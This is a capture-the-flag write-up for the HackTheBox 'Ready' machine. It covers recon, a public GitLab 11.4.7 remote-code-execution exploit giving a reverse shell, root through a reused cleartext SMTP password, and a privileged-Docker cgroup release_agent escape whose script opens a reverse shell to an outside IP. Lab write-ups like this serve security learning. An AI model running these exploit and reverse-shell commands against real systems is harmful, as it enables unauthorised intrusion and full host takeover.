HackTheBox - Ready write up
4 min read

HackTheBox - Ready write up

HackTheBox - Ready write up

Ready is a Medium Linux box.

Recon

As always, let's start with a nmap scan.

$ nmap -A -p- -oN scan.nmap 10.10.10.220

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
5080/tcp open  http    nginx
| http-robots.txt: 53 disallowed entries (15 shown)
| / /autocomplete/users /search /api /admin /profile 
| /dashboard /projects/new /groups/new /groups/*/edit /users /help 
|_/s/ /snippets/new /snippets/*/edit
| http-title: Sign in \xC2\xB7 GitLab
|_Requested resource was http://10.10.10.220:5080/users/sign_in
|_http-trane-info: Problem with XML parsing of /evox/about
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

As you can see, there are two ports open, 22 for SSH and 5080 for Gitlab.

Web

http://10.10.10.220:5080/users/sign_in

I register a user to find the version of Gitlab.

Gitlab CE v11.4.7

User

This version is vulnerable to RCE (Remote code execution), I use this exploit from Github.

$ python3 gitlab_rce.py http://10.10.10.220:5080 10.10.14.130
Gitlab Exploit by dotPY [insert fancy ascii art]
registering z5WS1NhskU:Gf7QvhGTUl - 200
Getting version of http://10.10.10.220:5080 - 200
The Version seems to be 11.4.7! Choose wisely
delete user z5WS1NhskU - 200
[0] - GitlabRCE1147 - RCE for Version <=11.4.7
[1] - GitlabRCE1281LFIUser - LFI for version 10.4-12.8.1 and maybe more
[2] - GitlabRCE1281RCE - RCE for version 12.4.0-12.8.1 - !!RUBY REVERSE SHELL IS VERY UNRELIABLE!! WIP
type a number and hit enter to choose exploit: 0
Start a listener on port 42069 and hit enter (nc -vlnp 42069)
registering TxA6x9UnTK:mHVy6vTFkK - 200
hacking in progress - 200
delete user TxA6x9UnTK - 200
$ nc -lvnp 42069
Connection from 10.10.10.220:37878
bash: cannot set terminal process group (507): Inappropriate ioctl for device
bash: no job control in this shell
git@gitlab:~/gitlab-rails/working$ id
uid=998(git) gid=998(git) groups=998(git)

We have a shell and the user.txt flag !

git@gitlab:/home/dude$ cat user.txt
e1e30b052b6ec06706...

Root

We now are in docker.

$ ls -al /
total 108
drwxr-xr-x   1 root root 4096 Dec 24 18:30 .
drwxr-xr-x   1 root root 4096 Dec 24 18:30 ..
-rwxr-xr-x   1 root root    0 Dec  1 12:41 .dockerenv
...
git@gitlab:/tmp$ systemd-detect-virt
docker

After some enumeration we can find some passwords in cleartext.

$ find / -name backup 2>/dev/null
...
/opt/backup

$ ls -al /opt/backup
total 112
drwxr-xr-x 2 root root  4096 Dec  7 09:25 .
drwxr-xr-x 1 root root  4096 Dec  1 16:23 ..
-rw-r--r-- 1 root root   872 Dec  7 09:25 docker-compose.yml
-rw-r--r-- 1 root root 15092 Dec  1 16:23 gitlab-secrets.json
-rw-r--r-- 1 root root 79639 Dec  1 19:20 gitlab.rb

git@gitlab:/opt/backup$ grep password gitlab.rb
...
gitlab_rails['smtp_password'] = "wW59U!ZKMbG9+*#h"
...


git@gitlab:/tmp$ python3 -c "import pty;pty.spawn('/bin/bash')"
git@gitlab:/tmp$ su root
Password: wW59U!ZKMbG9+*#h

root@gitlab:/tmp# 

We are now root but, we are root of the docker, not the real host. We need to escape the docker.

root@gitlab:/opt/backup$ cat docker-compose.yml
version: '2.4'

services:
  web:
    image: 'gitlab/gitlab-ce:11.4.7-ce.0'
    restart: always
    hostname: 'gitlab.example.com'
...
    privileged: true
...

As you can see, the gitlab docker is running in privileged mode. It means that all linux capabilities are activated. Thanks to that we can escape the docker and run command on the host.

Thanks to this article, I find two ways to escape a docker in privileged mode.

root@gitlab:/# mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x   
root@gitlab:/# echo 1 > /tmp/cgrp/x/notify_on_release
root@gitlab:/# host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
root@gitlab:/# echo "$host_path/cmd" > /tmp/cgrp/release_agent
root@gitlab:/# echo '#!/bin/bash' > /cmd
root@gitlab:/# echo "bash -i >& /dev/tcp/10.10.14.91/4444 0>&1" >> /cmd
root@gitlab:/# cat /cmd
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.91/4444 0>&1
root@gitlab:/# chmod a+x /cmd
root@gitlab:/# sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
$ nc -lvnp 4444
Connection from 10.10.10.220:58518
bash: cannot set terminal process group (-1): Inappropriate ioctl for device
bash: no job control in this shell
root@ready:/# id
uid=0(root) gid=0(root) groups=0(root)
root@ready:/# cat /root/root.txt
b7f98681505cd39066f67...

Rooted !

Enjoying these posts? Subscribe for more